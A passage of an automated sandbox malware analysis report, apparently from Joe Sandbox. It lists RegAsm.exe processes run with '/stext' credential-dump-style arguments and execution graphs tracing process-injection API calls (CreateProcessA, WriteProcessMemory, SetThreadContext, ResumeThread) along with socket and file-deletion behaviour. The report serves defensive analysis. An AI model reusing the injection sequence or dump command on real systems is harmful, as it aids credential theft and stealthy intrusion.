                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"
                    Imagebase:0x530000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:07:30:07
                    Start date:27/07/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"
                    Imagebase:0xe10000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:07:30:07
                    Start date:27/07/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
                    Imagebase:0x2f0000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:07:30:07
                    Start date:27/07/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
                    Imagebase:0xe00000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:4.5%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:14
                      Total number of Limit Nodes:1
                      execution_graph 4306 7ffd9b87c04d 4309 7ffd9b87c06f 4306->4309 4307 7ffd9b87c03b 4308 7ffd9b87c40e CreateProcessA 4310 7ffd9b87c4b6 4308->4310 4309->4307 4309->4308 4311 7ffd9b87bb2d 4312 7ffd9b87bb3b WriteProcessMemory 4311->4312 4314 7ffd9b87bcb8 4312->4314 4315 7ffd9b87b14d 4316 7ffd9b87b15b ResumeThread 4315->4316 4318 7ffd9b87b252 4316->4318 4319 7ffd9b87b2a5 4320 7ffd9b87b2b3 Wow64SetThreadContext 4319->4320 4322 7ffd9b87b3e8 4320->4322

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.1800796580.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: bf5810e09b4ea73d2a2b72c0791bf7e134f69e708077bd2a69a0e96d04f2f672
                      • Instruction ID: 08a67f285232c21c724bd95f76aeb52ebc99d805357a39c20b92b7f59d0b64b2
                      • Opcode Fuzzy Hash: bf5810e09b4ea73d2a2b72c0791bf7e134f69e708077bd2a69a0e96d04f2f672
                      • Instruction Fuzzy Hash: 24025170A19A8D8FEBB8DF18DC99BF977E0FB59310F00412AD84ED7291DB7596408B81

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.1800796580.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: dd0c19d7cc9d5af5d0d920616be999e844dfa85db410e238f412278515602020
                      • Instruction ID: 8afcec5aa8f7beb3a1b3369149a06bf8fb9116d040ce1b5cc87900fa410b2b48
                      • Opcode Fuzzy Hash: dd0c19d7cc9d5af5d0d920616be999e844dfa85db410e238f412278515602020
                      • Instruction Fuzzy Hash: CF614B70908A5D8FDB98DF58C885BE9BBF1FB69311F1082AAD44CE3255DB34A985CF40

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.1800796580.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 367bf258f4365f36d16dce0b6a27955a4b696d15fc6431db503bbc0f17301fdb
                      • Instruction ID: c0b321a061798b5a43304b890e20c510d1ac35c8eb465e2db72d391fccf32345
                      • Opcode Fuzzy Hash: 367bf258f4365f36d16dce0b6a27955a4b696d15fc6431db503bbc0f17301fdb
                      • Instruction Fuzzy Hash: 6E514A70D0864D8FDB58DFA8C885BEDBBF1FB59311F1082AAD008E7265DB749585CB40

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.1800796580.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 1f125505ebefa23613423521ee10b06b17952339889ef5ead485f97f2ccca2af
                      • Instruction ID: f3d4c75b0d9c8e9dfab24a05f4d32aa57dbbae4edc42d17e33ef88d9e589b166
                      • Opcode Fuzzy Hash: 1f125505ebefa23613423521ee10b06b17952339889ef5ead485f97f2ccca2af
                      • Instruction Fuzzy Hash: 5151BE30D0874D8FDB59DFA8C895AEDBBF0FF56310F1041AAD049E72A2DA74A486CB41

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ed821a2ed0d9b2173fc9e08393b2843c07e06a6eca9a478b633a1ac60b1b4de
                      • Instruction ID: 73ff35e160b51652f1f01d3e3d08aca01a63e628ca3c656d41878553c5ff22b3
                      • Opcode Fuzzy Hash: 2ed821a2ed0d9b2173fc9e08393b2843c07e06a6eca9a478b633a1ac60b1b4de
                      • Instruction Fuzzy Hash: 8C613622B2FAAE1FF7B9966C18756B567C3EF85210B4901BED45DC71E3ED0CA9018342

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ecf206440c381541babdd588fa5cf29abe32b0f04de39fdfb0e5c73f88ccecc
                      • Instruction ID: 43502faab9f20ad0696e7c63e5d8d92d86403b58c8620e0537020ee9fed13b7e
                      • Opcode Fuzzy Hash: 3ecf206440c381541babdd588fa5cf29abe32b0f04de39fdfb0e5c73f88ccecc
                      • Instruction Fuzzy Hash: 1941CD52A1F7E91FE357567818694A03FA19F23298B1E00FBD098CB1E3E809580AC362

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4f46acc514578ef271965a0fd8146ddd89bc4619e48c13872b2054ce4baad2e
                      • Instruction ID: 5faade6d95e90a936a832098cb13dfdf7460f57c414f7f7a1f5408a601aa0457
                      • Opcode Fuzzy Hash: f4f46acc514578ef271965a0fd8146ddd89bc4619e48c13872b2054ce4baad2e
                      • Instruction Fuzzy Hash: 4541E322B2FAAF1BF7B996AC18B517467C3DF95260B5900BED45DC71F2DD0C99014342

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8526ea066ea470a3fe965ece901963ceb03771e8562f0d221e89ba59e52cd3c
                      • Instruction ID: 524ec110d3fd1ea7224c01927753803e975ee1b7dcfa425fe7d572f6275c5147
                      • Opcode Fuzzy Hash: b8526ea066ea470a3fe965ece901963ceb03771e8562f0d221e89ba59e52cd3c
                      • Instruction Fuzzy Hash: 53315622B1FBD90FD7A69B7C18645607FE2DF96264B0A01FBC088C71F3E9198C098351

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80be5f26de5fbbc5d56014efa7c9ed9c717f384391b6b63dad9bf31e3571eb0b
                      • Instruction ID: 43a9c09e89ddbb7611ffdb56aa9f5cd74f9bf86cfbb70260c9aafe97f21e265b
                      • Opcode Fuzzy Hash: 80be5f26de5fbbc5d56014efa7c9ed9c717f384391b6b63dad9bf31e3571eb0b
                      • Instruction Fuzzy Hash: 53215723B1D93D1FEBB595AC64216F8B3D2EF98220B4906B7D40EC31E6DE19AC014381

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 346 7ffd9b943135-7ffd9b94313c 347 7ffd9b94313e-7ffd9b943159 346->347 348 7ffd9b94315b 346->348 347->348 350 7ffd9b943160-7ffd9b943169 348->350 352 7ffd9b943182-7ffd9b94318f 350->352 353 7ffd9b94316b-7ffd9b943178 350->353 353->352 355 7ffd9b94317a-7ffd9b943180 353->355 355->352
                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d46d4113510a60de0affd2dbfc454fed9597af480a3950401ddf075aa00b1673
                      • Instruction ID: 3995216dbc24d24a99946b348ee9318563e2566c773812ab0da843f39af43ece
                      • Opcode Fuzzy Hash: d46d4113510a60de0affd2dbfc454fed9597af480a3950401ddf075aa00b1673
                      • Instruction Fuzzy Hash: 15F0FC12F2ED2D2EF7FDD2AC29251B892C3DF99620B5941BBD41DC31A6DD049D010381
                      Memory Dump Source
                      • Source File: 00000001.00000002.1801380451.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e57fd92d6e89cd2890c91a1203efa7da727b2cb72246e6799b06389cc335b234
                      • Instruction ID: 083ac113043923289614243708ce2f02892aed523c7f0ad554487954aac8b20b
                      • Opcode Fuzzy Hash: e57fd92d6e89cd2890c91a1203efa7da727b2cb72246e6799b06389cc335b234
                      • Instruction Fuzzy Hash: 74F02713F1E9AD1BE7B6D1AC34252F863C2DF94520B5905B3D55DC3696DD04AC4103C1

                      Execution Graph

                      Execution Coverage:5.2%
                      Dynamic/Decrypted Code Coverage:3.8%
                      Signature Coverage:6%
                      Total number of Nodes:1882
                      Total number of Limit Nodes:69
                      execution_graph 52380 4165a0 52391 401e65 52380->52391 52382 4165b0 52396 4020f6 52382->52396 52385 401e65 22 API calls 52386 4165c6 52385->52386 52387 4020f6 28 API calls 52386->52387 52388 4165d1 52387->52388 52402 41292a 52388->52402 52392 401e6d 52391->52392 52393 401e75 52392->52393 52421 402158 22 API calls 52392->52421 52393->52382 52397 40210c 52396->52397 52422 4023ce 52397->52422 52399 402126 52426 402569 52399->52426 52401 402134 52401->52385 52474 40482d 52402->52474 52404 41293e 52481 4048c8 connect 52404->52481 52408 41295f 52546 402f10 52408->52546 52417 401fd8 11 API calls 52418 412991 52417->52418 52419 401fd8 11 API calls 52418->52419 52420 412999 52419->52420 52423 402428 52422->52423 52424 4023d8 52422->52424 52423->52399 52424->52423 52436 4027a7 52424->52436 52447 402888 52426->52447 52428 40257d 52429 402592 52428->52429 52430 4025a7 52428->52430 52452 402a34 22 API calls 52429->52452 52454 4028e8 52430->52454 52433 40259b 52453 4029da 22 API calls 52433->52453 52435 4025a5 52435->52401 52437 402e21 52436->52437 52440 4016b4 52437->52440 52439 402e30 52439->52423 52441 4016c6 52440->52441 52442 4016cb 52440->52442 52446 43bd19 11 API calls _Atexit 52441->52446 52442->52441 52444 4016f3 52442->52444 52444->52439 52445 43bd18 52446->52445 52448 402890 52447->52448 52449 402898 52448->52449 52465 402ca3 22 API calls 52448->52465 52449->52428 52452->52433 52453->52435 52455 4028f1 52454->52455 52456 402953 52455->52456 52457 4028fb 52455->52457 52472 4028a4 22 API calls 52456->52472 52460 402904 52457->52460 52461 402917 52457->52461 52466 402cae 52460->52466 52463 402915 52461->52463 52464 4023ce 11 API calls 52461->52464 52463->52435 52464->52463 52467 402cb8 __EH_prolog 52466->52467 52473 402e54 22 API calls 52467->52473 52469 4023ce 11 API calls 52471 402d92 52469->52471 52470 402d24 52470->52469 52471->52463 52473->52470 52475 404846 socket 52474->52475 52476 404839 52474->52476 52478 404860 CreateEventW 52475->52478 52479 404842 52475->52479 52587 40489e WSAStartup 52476->52587 52478->52404 52479->52404 52480 40483e 52480->52475 52480->52479 52482 404a1b 52481->52482 52483 4048ee 52481->52483 52484 40497e 52482->52484 52485 404a21 WSAGetLastError 52482->52485 52483->52484 52486 404923 52483->52486 52588 40531e 52483->52588 52541 402f31 52484->52541 52485->52484 52487 404a31 52485->52487 52623 420c60 27 API calls 52486->52623 52490 404932 52487->52490 52491 404a36 52487->52491 52496 402093 28 API calls 52490->52496 52628 41cae1 30 API calls 52491->52628 52492 40492b 52492->52490 52495 404941 52492->52495 52493 40490f 52593 402093 52493->52593 52506 404950 52495->52506 52507 404987 52495->52507 52500 404a80 52496->52500 52498 404a40 52629 4052fd 28 API calls 52498->52629 52503 402093 28 API calls 52500->52503 52508 404a8f 52503->52508 52511 402093 28 API calls 52506->52511 52625 421a40 54 API calls 52507->52625 52512 41b4ef 80 API calls 52508->52512 52515 40495f 52511->52515 52512->52484 52514 40498f 52517 4049c4 52514->52517 52518 404994 52514->52518 52519 402093 28 API calls 52515->52519 52627 420e06 28 API calls 52517->52627 52521 402093 28 API calls 52518->52521 52522 40496e 52519->52522 52525 4049a3 52521->52525 52526 41b4ef 80 API calls 52522->52526 52524 4049cc 52527 4049f9 CreateEventW CreateEventW 52524->52527 52530 402093 28 API calls 52524->52530 52528 402093 28 API calls 52525->52528 52529 404973 52526->52529 52527->52484 52531 4049b2 52528->52531 52624 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52529->52624 52533 4049e2 52530->52533 52534 41b4ef 80 API calls 52531->52534 52535 402093 28 API calls 52533->52535 52536 4049b7 52534->52536 52537 4049f1 52535->52537 52626 4210b2 52 API calls 52536->52626 52539 41b4ef 80 API calls 52537->52539 52540 4049f6 52539->52540 52540->52527 52542 4020df 11 API calls 52541->52542 52543 402f3d 52542->52543 52544 4032a0 28 API calls 52543->52544 52545 402f59 52544->52545 52545->52408 52691 401fb0 52546->52691 52548 402f1e 52549 402055 11 API calls 52548->52549 52550 402f2d 52549->52550 52551 404aa1 52550->52551 52552 404ab4 52551->52552 52694 40520c 52552->52694 52554 404ac9 ctype 52555 404b40 WaitForSingleObject 52554->52555 52556 404b20 52554->52556 52558 404b56 52555->52558 52557 404b32 send 52556->52557 52559 404b7b 52557->52559 52700 42103a 54 API calls 52558->52700 52561 401fd8 11 API calls 52559->52561 52563 404b83 52561->52563 52562 404b69 SetEvent 52562->52559 52564 401fd8 11 API calls 52563->52564 52565 404b8b 52564->52565 52566 401fd8 52565->52566 52567 4023ce 11 API calls 52566->52567 52568 401fe1 52567->52568 52569 404c10 52568->52569 52570 4020df 11 API calls 52569->52570 52571 404c27 52570->52571 52572 4020df 11 API calls 52571->52572 52574 404c30 52572->52574 52577 404ca1 52574->52577 52581 401fd8 11 API calls 52574->52581 52718 43bd51 52574->52718 52725 404b96 52574->52725 52731 4020b7 52574->52731 52737 401fe2 52574->52737 52746 404cc3 52574->52746 52759 404e26 WaitForSingleObject 52577->52759 52581->52574 52582 401fd8 11 API calls 52583 404cb1 52582->52583 52584 401fd8 11 API calls 52583->52584 52585 404cba 52584->52585 52585->52417 52587->52480 52630 4020df 52588->52630 52590 40532a 52634 4032a0 52590->52634 52592 405346 52592->52493 52594 40209b 52593->52594 52595 4023ce 11 API calls 52594->52595 52596 4020a6 52595->52596 52638 4024ed 52596->52638 52599 41b4ef 52600 41b5a0 52599->52600 52601 41b505 GetLocalTime 52599->52601 52603 401fd8 11 API calls 52600->52603 52602 40531e 28 API calls 52601->52602 52604 41b547 52602->52604 52605 41b5a8 52603->52605 52649 406383 52604->52649 52607 401fd8 11 API calls 52605->52607 52609 41b5b0 52607->52609 52609->52486 52610 402f10 28 API calls 52611 41b55f 52610->52611 52612 406383 28 API calls 52611->52612 52613 41b56b 52612->52613 52654 407200 77 API calls 52613->52654 52615 41b579 52616 401fd8 11 API calls 52615->52616 52617 41b585 52616->52617 52618 401fd8 11 API calls 52617->52618 52619 41b58e 52618->52619 52620 401fd8 11 API calls 52619->52620 52621 41b597 52620->52621 52622 401fd8 11 API calls 52621->52622 52622->52600 52623->52492 52624->52484 52625->52514 52626->52529 52627->52524 52628->52498 52631 4020e7 52630->52631 52632 4023ce 11 API calls 52631->52632 52633 4020f2 52632->52633 52633->52590 52636 4032aa 52634->52636 52635 4032c9 52635->52592 52636->52635 52637 4028e8 28 API calls 52636->52637 52637->52635 52639 4024f9 52638->52639 52642 40250a 52639->52642 52641 4020b1 52641->52599 52643 40251a 52642->52643 52644 402520 52643->52644 52645 402535 52643->52645 52647 402569 28 API calls 52644->52647 52646 4028e8 28 API calls 52645->52646 52648 402533 52646->52648 52647->52648 52648->52641 52655 4051ef 52649->52655 52651 406391 52659 402055 52651->52659 52654->52615 52656 4051fb 52655->52656 52665 405274 52656->52665 52658 405208 52658->52651 52660 402061 52659->52660 52661 4023ce 11 API calls 52660->52661 52662 40207b 52661->52662 52687 40267a 52662->52687 52666 405282 52665->52666 52667 405288 52666->52667 52668 40529e 52666->52668 52676 4025f0 52667->52676 52670 4052f5 52668->52670 52671 4052b6 52668->52671 52685 4028a4 22 API calls 52670->52685 52674 4028e8 28 API calls 52671->52674 52675 40529c 52671->52675 52674->52675 52675->52658 52677 402888 22 API calls 52676->52677 52678 402602 52677->52678 52679 402672 52678->52679 52680 402629 52678->52680 52686 4028a4 22 API calls 52679->52686 52682 4028e8 28 API calls 52680->52682 52684 40263b 52680->52684 52682->52684 52684->52675 52688 40268b 52687->52688 52689 4023ce 11 API calls 52688->52689 52690 40208d 52689->52690 52690->52610 52692 4025f0 28 API calls 52691->52692 52693 401fbd 52692->52693 52693->52548 52695 405214 52694->52695 52696 4023ce 11 API calls 52695->52696 52697 40521f 52696->52697 52701 405234 52697->52701 52699 40522e 52699->52554 52700->52562 52702 405240 52701->52702 52703 40526e 52701->52703 52705 4028e8 28 API calls 52702->52705 52717 4028a4 22 API calls 52703->52717 52706 40524a 52705->52706 52706->52699 52723 446137 ___crtLCMapStringA 52718->52723 52719 446175 52773 4405dd 20 API calls _Atexit 52719->52773 52721 446160 RtlAllocateHeap 52722 446173 52721->52722 52721->52723 52722->52574 52723->52719 52723->52721 52772 442f80 7 API calls 2 library calls 52723->52772 52726 404ba0 WaitForSingleObject 52725->52726 52727 404bcd recv 52725->52727 52774 421076 54 API calls 52726->52774 52729 404be0 52727->52729 52729->52574 52730 404bbc SetEvent 52730->52729 52732 4020bf 52731->52732 52733 4023ce 11 API calls 52732->52733 52734 4020ca 52733->52734 52735 40250a 28 API calls 52734->52735 52736 4020d9 52735->52736 52736->52574 52738 401ff1 52737->52738 52745 402039 52737->52745 52739 4023ce 11 API calls 52738->52739 52740 401ffa 52739->52740 52741 40203c 52740->52741 52742 402015 52740->52742 52743 40267a 11 API calls 52741->52743 52775 403098 28 API calls 52742->52775 52743->52745 52745->52574 52747 4020df 11 API calls 52746->52747 52757 404cde 52747->52757 52748 404e13 52749 401fd8 11 API calls 52748->52749 52750 404e1c 52749->52750 52750->52574 52751 401fe2 28 API calls 52751->52757 52752 401fd8 11 API calls 52752->52757 52754 4020f6 28 API calls 52754->52757 52756 4041a2 28 API calls 52756->52757 52757->52748 52757->52751 52757->52752 52757->52754 52757->52756 52776 41299f 52757->52776 52820 401fc0 52757->52820 52760 404e40 SetEvent FindCloseChangeNotification 52759->52760 52761 404e57 closesocket 52759->52761 52762 404ca8 52760->52762 52763 404e64 52761->52763 52762->52582 52764 404e7a 52763->52764 53393 4050e4 84 API calls 52763->53393 52766 404e8c WaitForSingleObject 52764->52766 52767 404ece SetEvent CloseHandle 52764->52767 53394 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52766->53394 52767->52762 52769 404e9b SetEvent WaitForSingleObject 53395 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52769->53395 52771 404eb3 SetEvent CloseHandle CloseHandle 52771->52767 52772->52723 52773->52722 52774->52730 52775->52745 52777 4129b1 52776->52777 52824 4041a2 52777->52824 52780 4020f6 28 API calls 52781 4129d3 52780->52781 52782 4020f6 28 API calls 52781->52782 52783 4129e2 52782->52783 52827 41be1b 52783->52827 52786 412a93 52996 401e8d 52786->52996 52788 401e65 22 API calls 52790 412a02 52788->52790 52791 4020f6 28 API calls 52790->52791 52793 412a0d 52791->52793 52792 401fd8 11 API calls 52794 412aa5 52792->52794 52795 401e65 22 API calls 52793->52795 52796 401fd8 11 API calls 52794->52796 52797 412a18 52795->52797 52798 412aad 52796->52798 52799 4020f6 28 API calls 52797->52799 52798->52757 52800 412a23 52799->52800 52801 401e65 22 API calls 52800->52801 52802 412a2e 52801->52802 52803 4020f6 28 API calls 52802->52803 52804 412a39 52803->52804 52805 401e65 22 API calls 52804->52805 52806 412a44 52805->52806 52807 4020f6 28 API calls 52806->52807 52808 412a4f 52807->52808 52809 401e65 22 API calls 52808->52809 52810 412a5a 52809->52810 52811 4020f6 28 API calls 52810->52811 52812 412a65 52811->52812 52813 401e65 22 API calls 52812->52813 52814 412a73 52813->52814 52815 4020f6 28 API calls 52814->52815 52816 412a7e 52815->52816 52849 412ab4 GetModuleFileNameW 52816->52849 52819 404e26 99 API calls 52819->52786 52821 401fd2 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 52820->52821 52822 401fc9 52820->52822 52821->52757 53252 415aea 52821->53252 53251 4025e0 28 API calls 52822->53251 53002 40423a 52824->53002 52828 4020df 11 API calls 52827->52828 52829 41be2e 52828->52829 52832 41bea0 52829->52832 52834 4041a2 28 API calls 52829->52834 52840 401fe2 28 API calls 52829->52840 52844 401fd8 11 API calls 52829->52844 52848 41be9e 52829->52848 53008 41ce34 52829->53008 52830 401fd8 11 API calls 52831 41bed0 52830->52831 52833 401fd8 11 API calls 52831->52833 52836 4041a2 28 API calls 52832->52836 52835 41bed8 52833->52835 52834->52829 52838 401fd8 11 API calls 52835->52838 52837 41beac 52836->52837 52839 401fe2 28 API calls 52837->52839 52841 4129eb 52838->52841 52842 41beb5 52839->52842 52840->52829 52841->52786 52841->52788 52843 401fd8 11 API calls 52842->52843 52845 41bebd 52843->52845 52844->52829 52846 41ce34 28 API calls 52845->52846 52846->52848 52848->52830 52850 4020df 11 API calls 52849->52850 52851 412adf 52850->52851 52852 4020df 11 API calls 52851->52852 52853 412aeb 52852->52853 52854 4020df 11 API calls 52853->52854 52876 412af7 52854->52876 52855 41b978 43 API calls 52855->52876 52856 40d9e8 32 API calls 52856->52876 52857 401fd8 11 API calls 52857->52876 52858 40431d 28 API calls 52858->52876 52859 403014 28 API calls 52859->52876 52860 418568 31 API calls 52860->52876 52861 412c1d Sleep 52861->52876 52862 40417e 28 API calls 52862->52876 52863 412cbf Sleep 52863->52876 52864 4042fc 79 API calls 52864->52876 52865 401f09 11 API calls 52865->52876 52866 412d61 Sleep 52866->52876 52867 41c485 32 API calls 52867->52876 52868 412dc4 DeleteFileW 52868->52876 52869 412dfb DeleteFileW 52869->52876 52870 412e4d Sleep 52870->52876 52871 412e37 DeleteFileW 52871->52876 52872 412ec6 52873 401f09 11 API calls 52872->52873 52874 412ed2 52873->52874 52875 401f09 11 API calls 52874->52875 52877 412ede 52875->52877 52876->52855 52876->52856 52876->52857 52876->52858 52876->52859 52876->52860 52876->52861 52876->52862 52876->52863 52876->52864 52876->52865 52876->52866 52876->52867 52876->52868 52876->52869 52876->52870 52876->52871 52876->52872 52880 412e92 Sleep 52876->52880 52878 401f09 11 API calls 52877->52878 52879 412eea 52878->52879 53044 40b904 52879->53044 53062 401f09 52880->53062 52883 412efd 52885 4020f6 28 API calls 52883->52885 52884 401f09 11 API calls 52887 412ea2 52884->52887 52886 412f1d 52885->52886 53050 41322d 52886->53050 52887->52876 52887->52884 52889 412ec4 52887->52889 52889->52879 52891 401f09 11 API calls 52892 412f34 52891->52892 52893 412f54 52892->52893 52894 4130a8 52892->52894 53065 41bd1e 52893->53065 52895 41bd1e 28 API calls 52894->52895 52897 4130b1 52895->52897 52900 402f31 28 API calls 52897->52900 52901 4130e8 52900->52901 52903 402f10 28 API calls 52901->52903 52905 4130f7 52903->52905 52904 402f31 28 API calls 52906 412faa 52904->52906 52907 402f10 28 API calls 52905->52907 52908 402f10 28 API calls 52906->52908 52909 413103 52907->52909 52910 412fb9 52908->52910 52911 402f10 28 API calls 52909->52911 52912 402f10 28 API calls 52910->52912 52913 413112 52911->52913 52914 412fc8 52912->52914 52915 402f10 28 API calls 52913->52915 52916 402f10 28 API calls 52914->52916 52917 413121 52915->52917 52918 412fd7 52916->52918 52919 402f10 28 API calls 52917->52919 52920 402f10 28 API calls 52918->52920 52921 413130 52919->52921 52922 412fe6 52920->52922 52923 402f10 28 API calls 52921->52923 52924 402f10 28 API calls 52922->52924 52925 41313f 52923->52925 52926 412ff2 52924->52926 52927 402ea1 28 API calls 52925->52927 52928 402f10 28 API calls 52926->52928 52929 413149 52927->52929 52930 412ffe 52928->52930 52932 404aa1 61 API calls 52929->52932 53074 402ea1 52930->53074 52933 413156 52932->52933 52935 401fd8 11 API calls 52933->52935 52937 413162 52935->52937 52936 402f10 28 API calls 52938 413019 52936->52938 52939 401fd8 11 API calls 52937->52939 52940 402ea1 28 API calls 52938->52940 52941 41316e 52939->52941 52942 413023 52940->52942 52943 401fd8 11 API calls 52941->52943 52944 404aa1 61 API calls 52942->52944 52945 41317a 52943->52945 52946 413030 52944->52946 52947 401fd8 11 API calls 52945->52947 52948 401fd8 11 API calls 52946->52948 52949 413186 52947->52949 52950 413039 52948->52950 52951 401fd8 11 API calls 52949->52951 52952 401fd8 11 API calls 52950->52952 52953 41318f 52951->52953 52954 413042 52952->52954 52955 401fd8 11 API calls 52953->52955 52956 401fd8 11 API calls 52954->52956 52957 413198 52955->52957 52958 41304b 52956->52958 52959 401fd8 11 API calls 52957->52959 52960 401fd8 11 API calls 52958->52960 52961 41309c 52959->52961 52962 413054 52960->52962 52964 401fd8 11 API calls 52961->52964 52963 401fd8 11 API calls 52962->52963 52965 413060 52963->52965 52966 4131aa 52964->52966 52967 401fd8 11 API calls 52965->52967 52968 401f09 11 API calls 52966->52968 52969 41306c 52967->52969 52970 4131b6 52968->52970 52971 401fd8 11 API calls 52969->52971 52972 401fd8 11 API calls 52970->52972 52973 413078 52971->52973 52974 4131c2 52972->52974 52975 401fd8 11 API calls 52973->52975 52976 401fd8 11 API calls 52974->52976 52977 413084 52975->52977 52978 4131ce 52976->52978 52979 401fd8 11 API calls 52977->52979 52980 401fd8 11 API calls 52978->52980 52981 413090 52979->52981 52982 4131da 52980->52982 52983 401fd8 11 API calls 52981->52983 52984 401fd8 11 API calls 52982->52984 52983->52961 52985 4131e6 52984->52985 52986 401fd8 11 API calls 52985->52986 52987 4131f2 52986->52987 52988 401fd8 11 API calls 52987->52988 52989 4131fe 52988->52989 52990 401fd8 11 API calls 52989->52990 52991 41320a 52990->52991 52992 401fd8 11 API calls 52991->52992 52993 413216 52992->52993 52994 401fd8 11 API calls 52993->52994 52995 412a83 52994->52995 52995->52819 52997 402163 